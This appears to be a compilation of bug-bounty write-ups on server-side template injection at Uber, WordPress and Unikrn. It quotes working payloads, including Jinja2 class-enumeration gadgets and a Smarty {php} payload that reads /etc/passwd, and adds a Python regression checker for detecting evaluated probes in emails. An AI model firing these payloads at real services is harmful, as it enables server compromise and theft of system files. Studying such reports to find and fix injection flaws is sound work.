Server-Side Template Injection Writeups
Uber - Template Injection Python RCE
Personal Blog Post:
Orange Tsai discovered a Template Injection on the rider.uber.com domain. Changing the user name to the payload {{ '7'*7 }} returns the value '7777777' in the follow-up "Your Uber account information has been updated" email notification.

// Payloads used
{{ '7'*7 }}
{{ [].__class__.__base__.__subclasses__() }} # get all classes
{{''.__class__.mro()[1].__subclasses__()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
WordPress - XSS
The billing_first_name body parameter on the POST /wp-admin/admin-ajax.php route is vulnerable to Template Injection, which allows Stored XSS on the account page.

The Stored XSS is returned on the accounts page https://mercantile.wordpress.org/my_account.

Unikrn - Smarty Template
A researcher discovered that one of the fields on the user invite page was vulnerable to Template Injection. Upon entering {7*7} into all the registration fields, a verbose error message was returned in the email notification, revealing a Smarty Template engine message.

This was further exploited using a PHP payload to extract the /etc/passwd file:
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
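
Both the Uber and Unikrn reports were confirmed by what came back in a notification email, so the same signal works as a regression check once the field is fixed. The following is an added example, not code from either report: it classifies a rendered message body for the two probes quoted on this page. The function name, the error pattern and the sample bodies are assumptions constructed for illustration.

```python
import html
import re

# Probes quoted on this page and the text each yields if an engine evaluates it.
PROBES = {
    "{{ '7'*7 }}": "7777777",  # Jinja2: Python string repetition
    "{7*7}": "49",             # Smarty: arithmetic
}

# Engine error text in the output also shows the input was parsed as template source.
# Assumed pattern; extend it with the engines you actually run.
ENGINE_ERRORS = re.compile(r"smarty|jinja2\.exceptions|TemplateSyntaxError", re.I)

# Constructed email bodies, not taken from the reports.
SAMPLES = {
    "fixed": "Hi {{ &#39;7&#39;*7 }}, your account information has been updated.",
    "vulnerable": "Hi 7777777, your account information has been updated.",
    "verbose": "Fatal error: Smarty Compiler: Syntax error in template",
}


def classify(probe: str, body: str) -> str:
    """Report how a rendered message treated a probe stored in a profile field.

    Returns the most severe finding: "evaluated" (input reached the template
    parser), "error" (engine error leaked), "literal" (echoed as data, the
    expected result after a fix) or "absent".
    """
    text = html.unescape(body)  # autoescaped output still counts as literal
    expected = PROBES[probe]
    # Match the result as a standalone token so "49" inside "1490" is ignored.
    if re.search(rf"(?<![\w.]){re.escape(expected)}(?![\w.])", text):
        return "evaluated"
    if ENGINE_ERRORS.search(text):
        return "error"
    if probe in text:
        return "literal"
    return "absent"


if __name__ == "__main__":
    print(classify("{{ '7'*7 }}", SAMPLES["fixed"]))
    print(classify("{{ '7'*7 }}", SAMPLES["vulnerable"]))
    print(classify("{7*7}", SAMPLES["verbose"]))
```

A short result such as 49 can appear in a message for unrelated reasons, so compare against a baseline message sent with a neutral field value before treating "evaluated" as confirmed.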
